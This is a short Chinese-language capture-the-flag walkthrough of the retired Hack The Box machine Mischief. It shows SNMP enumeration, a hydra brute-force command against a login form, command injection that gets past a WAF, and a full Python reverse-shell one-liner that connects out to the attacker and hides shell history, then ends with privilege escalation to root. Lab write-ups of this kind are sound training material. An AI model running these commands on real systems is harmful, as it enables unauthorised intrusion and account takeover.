本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.92
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.92 -o ./Mischief-autorecon
根据上述的扫描结果,得出目标开放了重要端口161,通过此端口读取IPv6地址信息,并根据获取的账户密码登录目标靶机web应用
上述两种形式得到IPv6地址,不过他们之际只能使用其中一种形式,原因在于是否把配置文件/etc/snmp/snmp.conf 里面的mibs注释与否
将得到的IPv6地址追加到的hosts文件里面
echo "dead:beef:0000:0000:0250:56ff:feb9:f449 mischief.htb" |sudo tee -a /etc/hosts
使用hydra进行爆破用户名
hydra -I -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p trickeryanddeceit mischief.htb http-post-form "/login.php:user=^USER^&password=^PASS^:credentials do not match"
使用上面得到的用户名和密码访问IPv6地址的web应用,并登录
通过测试可以在上面基础上加单引号;前后都加即可执行命令,但是目标还是存在WAF黑名单,有一定的防护作用,不过还可以反弹shell,具体操作如下
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1004",8833));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/sh");s.close()'
上述是反弹代码,通过burpsuite进行操作
上述反弹shell之前也是可以直接根据页面的提示读取密码信息直接登录目标靶机
登录成功直接读取了user.txt
读取历史记录信息
发现了密码 lokipasswordmischieftrickery 通过用户loki进行su切换,发现没有权限,那么使用反弹shell的权限使用su切换至root用户
